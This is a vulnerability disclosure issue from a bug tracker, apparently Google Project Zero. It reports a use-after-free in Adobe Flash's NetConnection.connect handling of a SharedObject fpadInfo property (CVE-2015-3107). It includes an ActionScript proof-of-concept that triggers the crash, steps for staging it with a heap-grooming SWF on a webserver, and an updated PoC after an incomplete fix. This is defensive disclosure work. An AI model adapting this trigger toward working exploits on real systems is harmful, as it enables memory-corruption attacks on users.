New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 2 users
Status: Fixed
Owner:
Email to this user bounced
Closed: Aug 2015
Cc:



Sign in to add a comment
Use-after-free in NetConnection.connect
Project Member Reported by natashenka@google.com, Apr 28 2015 Back to list
If the fpadInfo property of a NetConnection object is a SharedObject, a use-after-free occurs when the property is deleted. A proof-of-concept is as follows:

var s = SharedObject.getLocal("test");

ASSetPropFlags(s, null, 0, 0xff);
ASSetPropFlags(s.data, null, 0, 0xff);
var q = {myprop  :"natalie", myprop2 : "test"};
s.data.fpadInfo = q;
s.flush();
var n = new NetConnection();
ASnative(2100, 200)(s.data);
n.connect.call(s.data, "");
trace(s.data.fpadInfo);
s = 1;

//GC happens here

setInterval(f, 1000);

function f(){

	ASnative(252, 1).call(q); //Array push
	delete q.myprop;
	
	}

A fla, an AS file and two swfs are attached. shareddelete.fla compiles to shareddelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and shareddelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. 

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
 
loadswf.swf
1.5 KB Download
shareddelete.swf
1.1 KB Download
shareddelete.fla
5.2 KB Download
loadswf.as
1.9 KB Download
Comment 1 by cevans@google.com, Apr 30 2015
Labels: -Reported-2015-Apr-28 Reported-2015-Apr-30
Comment 2 by cevans@google.com, May 1 2015
Labels: Id-3630
Comment 3 by cevans@google.com, Jun 4 2015
Labels: CVE-2015-3107
Project Member Comment 5 by natashenka@google.com, Jun 9 2015
Status: Accepted
This issue is not fixed, despite being in the bulletin. I've attached an updated PoC that causes a crash in updated Flash. Only the shareddelete.swf needs to be replaced, otherwise follow the instructions above.
shareddelete.swf
1.1 KB Download
shareddelete.fla
5.3 KB Download
Project Member Comment 6 by natashenka@google.com, Aug 11 2015
Labels: Deadline-Exceeded Deadline-Grace
Status: Fixed
Project Member Comment 7 by natashenka@google.com, Aug 18 2015
Labels: -Restrict-View-Commit
Fixed for reals in the August update.
Sign in to add a comment